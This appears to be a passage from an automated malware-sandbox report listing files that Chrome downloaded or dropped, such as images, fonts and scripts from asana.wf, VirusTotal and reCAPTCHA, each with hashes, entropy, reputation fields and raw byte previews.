                                                                                                                                                                                                                    SSDEEP:6:XthxHyz+7HifyR9qQCLiNxoPlJJj8ZHbCDPev+NU3qF:XDxS2qQpNxoPmyUK
                                                                                                                                                                                                                    MD5:640851DB4D1E75D5336AACDA07F92953
                                                                                                                                                                                                                    SHA1:0D6DC54F97D9F1418D57C551F9C0F857704E96BD
                                                                                                                                                                                                                    SHA-256:3E1D01812EFF9DA73225F35CA4D540744357C2BA8C76672361B1489CE36936BB
                                                                                                                                                                                                                    SHA-512:63BF2B029E2AE505B8D4F5B581E20A48A05150E56BED31A25300A1F68313AEFF212DB291BEECA1A217969760F8BE03AD60ECA41268FE14ABA73F5A2A4E65DF18
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/74552.2e8192dc6c15c665f808.js
                                                                                                                                                                                                                    Preview:..........|.Ok.0.....E/..h.$FKw......T...mV.dI....n .e.....o...|..&9..|.W..\4Ou.....k...?..VV...kP......y..Ji.H+......( ...^`..D..@@..R..n^..+0.f...}..B.F.. ....n..i.>.w.3......}{..g...xr....0T0....7....U....o(...#9.*b"(%G6g....O.........3.H...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):41224
                                                                                                                                                                                                                    Entropy (8bit):7.993002139217561
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:768:cETUa4lPnbCNIBGbuuAqry87yUOKfivm0yBFtt7lCGG4SbFc9Zrqpwl58X/MMCQa:cETUlJLBGbjAqhOKfieBGGG4SyZOrvMB
                                                                                                                                                                                                                    MD5:1EEDA9AB347503FBAE60C78F5239D61B
                                                                                                                                                                                                                    SHA1:4B926835362AB22B87053331443DF53FAA3BEF18
                                                                                                                                                                                                                    SHA-256:3BBEF196F2519D64E73A38C4D3BD658858EE88F14E81C9CF96F6A8A585E90C77
                                                                                                                                                                                                                    SHA-512:67D162D010C57608252844CFD287EBE955A023D85F8D9A0C0F1F7013416E23FE5D54010125EC35220B3AFED76A79A1DDDAE7B0ECE34849652B873D6BEBCC3C08
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X......../../..ALPH......U..6..!\(B..A$.....,.2.....s..;_.cF...KO..1..q..[..t..q.^...8..+.c...h..2....F...yT.\..21z.k..r..iT."..b..F...C.X.b1.o..zT.>.e..........................................................................................................................................................................................................................................}/G..jq.Y-..X..Z...-b*.9E.^).........L...~*......B../]z}.s....6.....Y.2.).=..=.a.>?...VP8 ....p....*0.0.>.D.J%.).&.*.0..gnP.8......j.&.Y%8..b..;..|....y......qizk..../~......H..E.C.....G|.....P.T............./............on..v.L.+..=.5........w.}.{z}*~..?...+..g....J:h.H.6.M..*.(...S...8>h.(.Q.B...P.......G.;oO..I.w...J.TKl..V..o[.u.y..S#4.6<.}..Tf....zM.m.....K...m............m..q.e..vG.m....)]YR...]....e.."_..v.')...P.<..Bk.B.......MJod+#...r.@....0Y}.|c....1{..`.......wd.!....7..[.rPj.......t....dI&z...o..8..^G.9Q-?.n.6.5..u.J..4.m.Q.O.E....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):3854
                                                                                                                                                                                                                    Entropy (8bit):7.6425967221194755
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:zYoFqeVgDoLShRCBbF5yQD/O6gfkj82yzd:FWDouhRC1LyQD/O6MkQfp
                                                                                                                                                                                                                    MD5:A55C241653F1FE6560D12B9B3C885243
                                                                                                                                                                                                                    SHA1:D1390E7CA2818CA367379A7701D071A5CB6076B2
                                                                                                                                                                                                                    SHA-256:20375334A44EDD41F7F8CC6FC7679F977CDA5F0A61C346D27726622C8415AA39
                                                                                                                                                                                                                    SHA-512:35BDF658FA79F019F7CC020DD835F66DBA778624F4E0CB86973CF2C827282AFBD4C38CBF7A30705FE59B155CA430ED2A4C7CA8F57FF3B33C94E2BBF640364B77
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/HOME24-web-hero-IDC-2x-en-US.webp
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X......../.....ALPH.....g`.m......>""..:.j.m....H..v....f..T.`.e.......tG....mn.d....'b..`.x.c.E...Y!s......qV...%..WOL*$S..]QytE..+..].......?............?............?............?............?............?............?....]q...W...b...=....W...y...]R.r.YA.#.....pV.h..mj.a....7...nVj...VP8 ....P....*0. .>.H.L%..""......gn.u.............%~3...._.......B..{3.^2#..O9).r....i...k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k. .k.|w.~%...W%V....L..l.S"...^Z......8...}...k..c..Bl.1...A...A.aV......6..).JD1..bY.h..8.....H.D..3/.Se....A$..@I..q.+.@L)...n...pW..."...y..k. ..r.G...9A....?.X.<l;.e....V.x.....?..k.I.&..Y.....I.<J.$...<.}5..}5.-....y.....&MDo...0D.{}.k...{m..T..p..E..._..._...W....*.z..a..Sccz...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):13080
                                                                                                                                                                                                                    Entropy (8bit):7.987134820829888
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:bHZL3XVQS187JOvmiM/QAY0qBTbRTxKj5D+lhXJLoIAf1:lL3WOFvm7/zY3TbRdYohXJe1
                                                                                                                                                                                                                    MD5:116883D2DA0F447AB85349F7DCE20D43
                                                                                                                                                                                                                    SHA1:52EE979D7CD7998307D2F357E3C7EEEA93C75A6D
                                                                                                                                                                                                                    SHA-256:9F998BAB9727CA8AB20189AACEE1A122EA0F17F3920E64127CFACF85A36E6C41
                                                                                                                                                                                                                    SHA-512:BA4A97E633CA3FA7DA5A24F8BCF5E5A59A9F0144FFF8E57D3A3CC66F7CC4522CCDDF4921D7A8C2F1E9B9E9538D587B788E3A707DA555B6AD3FAD0A02A386EA75
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.3..WEBPVP8 .3...L...*0.u.>.@.I%..&*..8...gm..K....-..y..6.....&../.j.c..]....;.3..S9.....Cx....W.....?....kmq....Ns.>..o....vF...SDv.Y.z..t.a@s..h.\;....2.$w.....<.w......z..[p.../..x......5...>..m[..!..........Dv.U.......L9..d p.........2..4c...K...s.e.!.....fO=b..s..A..>.?..........FB..L. .A..F(.ztc...........c...z.R....j"J..l.b!.F&.1....`..1s..C'.%...#.u....E..{.&.....e..W.......X.....g2...-4......t..S......<$/. ..=[.o....-.,...?>ix.Hv.......EC..Qa...>.....o..E...g.=...Q.'..C.CZb.7:5E...)aJ.]]......h......z.u..O......F".Y..YGe...Q.....B`\..z"..y...)...P.......+..V.....*.4kk.;.....D,p5..<hi>.!......;..q..D...a.g5s...O|........~..#..d...../..R[U.p7..0..]G..?.....<.jm6.~/aA...G...^.!....7"...Y0ON....w.#uM..........[.D_.:.5X....d...Q.........#..+.@..Yp.\...SD.*.q.nI..o....d@<B.3)N.q........=....f-K..O3.?F....r$..;8..X....n.I.2*.......XE.p.1........}...'.W...Hlk(......&...$...wg..d...;.VB.MF..`$..&.Sg.../q.........h.(sN.....)
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):15830
                                                                                                                                                                                                                    Entropy (8bit):7.976794931119543
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:zgw09IEWWo7tcWqX5re/9kfZK9oeKjF895KBvhr/:DmI6o7pUrbZsFUqOJj
                                                                                                                                                                                                                    MD5:57B54FF454DE0F8F5930F78C8AF2B4EF
                                                                                                                                                                                                                    SHA1:DF651E8BA9E2F1F57C29DA42B9423D4875E9C695
                                                                                                                                                                                                                    SHA-256:8EFC140BC3690CCBA1CCE304638BA2922D0676F78DF3F4939B456490B0471B9D
                                                                                                                                                                                                                    SHA-512:C81065F4A1A826B4B0DC78566499B1519F0B96E1194C4F9CBBE05E8CEB8030BB60E678A285B3D8D0C7F3FCA74DE4FC02B8213D36E451F48027C9CAD56881965C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/home24-templates-thumbnail.webp
                                                                                                                                                                                                                    Preview:RIFF.=..WEBPVP8X......../../..ALPH.......I..j$ a..)8`........p..........P{....{..m.[...q,.......p..x.}.......{H....1.?......{P.U..r..Y.V.....}..uK.m...?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?.G.L...........CZ.Z..V.d.RUkR...6sb...9...%%........g>.^..H.....H.u..m..<...j/.VP8 .;..pw...*0.0.>.F.L%.."!R)....in.|..k.9.._3...Z.......'=.......w...@../D...._).}...E..........'..........$}z..................|..w......?..k....?.z......_.....z_...W.?`.......;.....=.?........._...?..n.....o..!..............G...........lG....I....N..2......F.<)...*..Z.{..m....`!.a.|......iwD:...!..!3.>_....H.=7....z.[..l...}.....].....u'Wm.6.."U..,.v.J..).......~.j.o...S.W.fV...iwD.,?.x..4..Xio...........!t....^W..f..DL..Dt.>..>.;.(?...\..<)...c.|....V.:......2.]..1....l.#zF$..u'RY-[VN.u$...r7l.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):325943
                                                                                                                                                                                                                    Entropy (8bit):3.468216808243869
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:yNYbkCje32cdvSHUdR5et9+VbkCbMbkCbV2A9IhbDCSHLivbDCmtUbQCrsnbkCHs:yr32cdvSHUdR5et9+s9IHLiZeTPqS
                                                                                                                                                                                                                    MD5:6F2AD4E53ED978DE47AA37EEE455C9CF
                                                                                                                                                                                                                    SHA1:188AC799BBCF37F3400407120723E36A30974510
                                                                                                                                                                                                                    SHA-256:6E44A5B13B0587D3B6BA7BC4B44C90C6ABD70273FBA331EA5BB491F06989AD97
                                                                                                                                                                                                                    SHA-512:2A001C31AC362B5C9AD8C941ABE35BD55E0F82982CC50293EE7A262AF5BE25F84625DECBB0FA0559E2FFA69DC2248EF28800B5C8044E2650696FB431DB360F20
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "accounts.google.com",. "type": "domain",. "links": {. "self": "https://www.virustotal.com/ui/domains/accounts.google.com". },. "attributes": {. "last_modification_date": 1714074919,. "categories": {. "BitDefender": "parked",. "Xcitium Verdict Cloud": "web applications",. "Sophos": "search engines",. "Forcepoint ThreatSeeker": "search engines and portals". },. "total_votes": {. "harmless": 10,. "malicious": 3. },. "last_https_certificate": {. "cert_signature": {. "signature_algorithm": "sha256RSA",. "signature": "8993f67a0aabe98bf624db40f81aa7bd2090cce9b28905686efacd90d859e4651e69c653135bc5e6b3e8e90b2743622b605bd4c712f5f
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 39450
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):12114
                                                                                                                                                                                                                    Entropy (8bit):7.984207101126287
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:ZEOWqEb5G066PxIfCoeVNO2L8L1E5N0ztHcEOOFRgF5s7zYHMM5S7aJuv00JQBbz:WqE403PxQ9wgL1M0zt8Kn4MsbS7WW0nV
                                                                                                                                                                                                                    MD5:5E9390C2312A624537ADE567B0B73160
                                                                                                                                                                                                                    SHA1:9D8E7E5F985A71D217982DB3E3C044444C3D476E
                                                                                                                                                                                                                    SHA-256:0266145D6BD2AE45770E818AE88B8E27E786BF7C726A6BC2649378218B3D5524
                                                                                                                                                                                                                    SHA-512:1EE6F8506F13423EA80A8179D73310E2EEBC6F78184ED2F070B67A2BBD2387D81E9890DC8A04820F263DCB7B53249B299C67318CAEA6B97E8D93D3BE92E180B7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/25701.8d6eda00aa53bf2b91bb.js
                                                                                                                                                                                                                    Preview:...........}{{......S L.........q|....JJ.....RDL...ZVh~....d.73...BIv............mg..u..$..I.8i&j1...x.O.=...w...:.-. .^S...-o.N..7oz..N..?:8.G...{..........[w...vz.f.*7h..o./n...x.r7. \EA.>.D..p.:..$u.a.<:...[."..i....!5......c&.'.~:.....S?.P.+%...G.k........$/......z......;.Lc?..c.-{l..8.F23......S....~.M...=.........q...?......~....r......^.P...A.....n.F........:{h0.n..C|..c........n.K......TO(m.3|d|...|<..:.u..G..=.......>^..~.z...=,C......w..H....X..a.d.R.{...S.W....}.>q_.....g.K.............O.G.......p......R7L.(u..S.O.E:L....:...:.TX....M..I......o...0.{...Zm...y3mmb....y..S'@....Q....5....A..X%..=.y.\.ML..f3O1s6.)m.xn5L.A..C..z..49.3.....7.Y/..;&...W...6c....\Xk..].m..C.p......y.]r......vK.Z.C...P.."s..../.9.6.j.....b8........j.z../C,j....J&q.J#..,a....f#..0.Z.h...}..i..*u.TM..OU+...YQ..Z@..0.&....=...;'~..jF...m..f<l.*"p. .O..#.f..Z.............Y.*.J......t8Y.I.&*.&..[..a...'...&Y.?M..2.h..%^.v..o.,X....4.|....Cp.{5.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8764
                                                                                                                                                                                                                    Entropy (8bit):7.944825415489751
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:8MWksO8NCl+7A2ZIWbvlXw/e0e/iq0ERi/pKFVG+tfGBZzLdnmmv:PWksTNtA2hbdkw8/pKFU+t+BR5nmmv
                                                                                                                                                                                                                    MD5:D834C97492CF87524B1FFA201AE05BBB
                                                                                                                                                                                                                    SHA1:0915C22AC8353C9423DCFCC61E7071D49F4C0C08
                                                                                                                                                                                                                    SHA-256:1614E807C8DF7665D0BDF4BF47099C45A94FC27EC69B9DE53C081B7A92929D65
                                                                                                                                                                                                                    SHA-512:95CE816D69CCEC15AC381B23D8DDB0891A2DC9F6943DC66CA75038733A26932706DD8206A00CEBCA8CB8B2956124B146A2F8DF44918A5DF584E1B623B85075BA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:.PNG........IHDR.............R.l...".IDATx..]...u.......w....H..c.........U.I.M.r.....!+!..)....!.lH.....m.`c...`./iW....}........>..w.j{..n..s...<~..mmmmA[|...6.1i.A.........%;..n3....=G...4.W..G=.......&...@..2..3..f.o...@....].V..L...@.....M.4.... .....(.4M.Z*Y.........6K~.x'.F.U.K....NWylm..c...6S........U.Kmp...W.&t.f;..f&...........j..".....r..32.8e!.b.BFR..mE....0......o.3.T.1&.D..._..c...`..f.....e...i;..Q........!ds.w.:u*.i......?Fvl.......~.9&.....9.;.D.`..f.h..?..fM.......0[.?T....^......~......c. ..LU...i....k..........Z.c.}.7.)....X./Cv...nm..&.6.#]a{..3I9.........fvCF...... ....+@~....@0............L.*%.N.*..w...5Q.$.j:b.C.4E.gO.w.0st#*hO<..].y.*;.dD.).f.t=*7K...iC.....a...XJ......}..da...c..&.D.(r..CgW....oY.<.[....;Xh..23.v.)..C. ...5..v.....h.....8......V.ovW/...g...Q w..$....._..cl.S...Fr..M....@.....I.m.T.|....fa.b..T.Gg$.tf....=..)..<@....U.$.3.oT...|...}.L.@e..P'..qc...I.7.....U....l...C./....|....7.GB
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (631)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):517649
                                                                                                                                                                                                                    Entropy (8bit):5.713376874006511
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:m1K1Z7NMxjW6eJoWvAlUjWwuMSYCVvLk8DSWd1Ps8Jz38iZc:m6eWTAujfuPY0JGgkt
                                                                                                                                                                                                                    MD5:E2E79D6B927169D9E0E57E3BAECC0993
                                                                                                                                                                                                                    SHA1:1299473950B2999BA0B7F39BD5E4A60EAFD1819D
                                                                                                                                                                                                                    SHA-256:231336ED913A5EBD4445B85486E053CAF2B81CAB91318241375F3F7A245B6C6B
                                                                                                                                                                                                                    SHA-512:D6A2ED7B19E54D1447EE9BBC684AF7101B48086945A938A5F9B6AE74ACE30B9A98CA83D3183814DD3CC40F251AB6433DC7F8B425F313EA9557B83E1C2E035DFF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js
                                                                                                                                                                                                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Web Open Font Format, TrueType, length 55956, version 1.0
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):55956
                                                                                                                                                                                                                    Entropy (8bit):7.992382995369991
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:1536:kTnGQLFoeUnO/4ESTIj+7zFQGtgmYicMsv:len/kkjuzjgSI
                                                                                                                                                                                                                    MD5:9C48B3D9849F9B4ECB09A090546C788A
                                                                                                                                                                                                                    SHA1:31CACBD39C93248B7B33A63FDF36D1722DB236FA
                                                                                                                                                                                                                    SHA-256:221CF949429418DA50502EEA454F043D1C98585604970D0137B0100B760D6C93
                                                                                                                                                                                                                    SHA-512:BA12864F88E04167F0D086B3D9C17C6CFC5368F4ED30E43F02B9E9059D1136AE9C3C9D013220192FFC6739C73D40A64C8004DB707EE65654B6456665A01B3939
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/fonts/gordita/gordita-medium.woff
                                                                                                                                                                                                                    Preview:wOFF.......................................FFTM...l........|..GDEF.......>...B...cGPOS......H....Z=.'"GSUB..Jh...G.......OS/2..M....S...`j`.jcmap..N.............gasp..Q.............glyf..R...pt...X...ohead...t...6...6.1T#hhea......!...$....hmtx....... ......y.loca.......T.......8maxp...D....... ...Vname...d...I...4g.D.post..............webf............X..........Q.j.....!.........#x.c`d``..b+ fb`g`d...:.. .............ne.........u0.....k..x...|T.....$aI...Q...p..D.V..Z[A.-........_k[.Y....k.k.[.MDa.......!@`.....&!.%3.I........37a..7.....3s.Y.s...y.s.M.R..O.......w..G......."....O.k.%\..)b.....O..:s..3o...e..!?...~....\x.w..]S...<..HR..\"..KD..'...)B^.k5..|....<.<.g@..}....>e}^M...R..........s..'.N..JJHJKz4iq.7...z..}...=....J...[....n@...i.&..|"9.2.#-e~r(94..+'R.N.}.Z.C)m.S..4....\5p.........6h:.u.I....W.....X...1.)..G...>.T.....+...2zP`.........c.6.c@K...yJ..F.-yZ.q..Ht......h.y4.D......2m.!?...C..f..8%-.2_.UC...Cg.}N..:.]...........}..}.?,..;)
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):241
                                                                                                                                                                                                                    Entropy (8bit):4.9463265102947735
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:3RsJwouzsY6A++sdLA23MA7DQ6bIrSQnDIQCfym2T4EBMAn:K+F2AwrDDerSnQCu8EBMA
                                                                                                                                                                                                                    MD5:1381063638FBF90B039899225169F353
                                                                                                                                                                                                                    SHA1:714DBC68F0590678B6CE1D628288791F8121884B
                                                                                                                                                                                                                    SHA-256:1FE23AC5E6E8BA00E97688A4DE76E3DEC5E4F5C2AB80B745DE90FA90CF1A1123
                                                                                                                                                                                                                    SHA-512:E0E81D2F229CC05B42E485A63115112F29E55B2636A143E781A6F0F473AB1279A573CEF465646565E1C5D3FF74337B4256DFECCF473C086173DFCA7265B3B684
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter
                                                                                                                                                                                                                    Preview:{. "data": [],. "meta": {. "count": 0. },. "links": {. "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?limit=10&relationships=item%2Cvoter". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 37014
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):11533
                                                                                                                                                                                                                    Entropy (8bit):7.98176445629237
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:zgUpCvlCic1hhGI3/KvRGHjws0I7RpqXc71+P6JS9xfu3v0wHOe3oYocXmIpNGAY:zg5XcQpvRabftpqM8Pfu3sw1lL2AGAY
                                                                                                                                                                                                                    MD5:F02177533276CF69AF21234B037F5E63
                                                                                                                                                                                                                    SHA1:7EC339BD3094C4F3A29D13AD13B8064AF77D76B2
                                                                                                                                                                                                                    SHA-256:1571507AABF83A5EF6822A1A1A3050FA7F41E97561750B8EE5E2871149A7D71A
                                                                                                                                                                                                                    SHA-512:9F25CEF398FB0B2C7F0A88984185D58040CB0C75C63ED6BCBD9D26FB901FADED987A540672AFF0F786137020EBABC5E0E101999351EF613AA43253F181288D8B
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/26603.b1862f8ab179e4a6fcde.js
                                                                                                                                                                                                                    Preview:...........}k{.F......3c.1.."R"eJ.8.x.g2k9g...k..H"........}.... (.>>..!q,S}...{7....,.fY......kwv}..D.7.M.a..........7...]o8....h4..~.d....o.ff.v..oc'i.-;v..oo/...K.M2....?...(...q..S.p..A.q.h.:.q.+...Qo.......Q.u6..4.R....K...8...l..?.....n.Z...>......d....s.'...vQ./dSZ.qg$..uO:.-;-......>..''.....tt.i..>....N.l..fY.G.L..N..N...-..d.... ...n....f.f..&~.I".&.<+F..u.8./.f...-.WA.;@]..P..-...!Z.|..G.6[<.?.Aj..7YlV~..gj.....f3.E..c:..w...AC....5S^ed.v#..7lL\...6......&....Z..ag9..5.d.@b1k'..E..qR../.q....d.\$.......Y..O..V.....{?.%.:.q.0.qr.....6&..~..s.?.......^....8q3..MT.(.....1..n5.v..=.t..v...@....'.h.U...qzN.0G..?.Z.....6.......J....W....N..y.R>.`A...Y...mf...6..MM.qr.h.D)N...]/..W.).p.{.qHX....o....]&..........Z .4.bwm!S..iA..q.gV.r..8.<y"$....]...'..N....]..XZ....|3.<..S.M.....v@<....w.....!....AA...tn...:.(..=>.S...}....:...Z.)M..a..........M&t.C..[c..c....on.R.Z...v...%i.E....B.7..".... ..;..E.Y...Y.=......l.o
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                    Entropy (8bit):3.75
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:H0hCkY:UUkY
                                                                                                                                                                                                                    MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                                                                                                                                                                    SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                                                                                                                                                                    SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                                                                                                                                                                    SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlxnlqomOC7AxIFDVNaR8U=?alt=proto
                                                                                                                                                                                                                    Preview:CgkKBw1TWkfFGgA=
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 24753
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):6729
                                                                                                                                                                                                                    Entropy (8bit):7.973947823282571
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:Worpdlpt5Vs5MFTat73YEb+Fa3qxkODCkSJgl:WoDlZuM5axoEuFQgl
                                                                                                                                                                                                                    MD5:68E4EBEDFDD38779D66FEA792240EDB6
                                                                                                                                                                                                                    SHA1:F774E0B3049E375BAA100E0BB34F6A2C803D63AD
                                                                                                                                                                                                                    SHA-256:885F39EF6A1D592EA055226BD2E744422AB15A484EFABFD469A55DFCF370FC1B
                                                                                                                                                                                                                    SHA-512:A7B3123B3B7680BC415A83041F78DC6CB49788195647E3FFCCB533E2E29BB41D3796DA158A34C42A1F02D52B66E222DD9C3224CDAA322D6CC112181D72010286
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/16756.15df081c2329888e4ed1.js
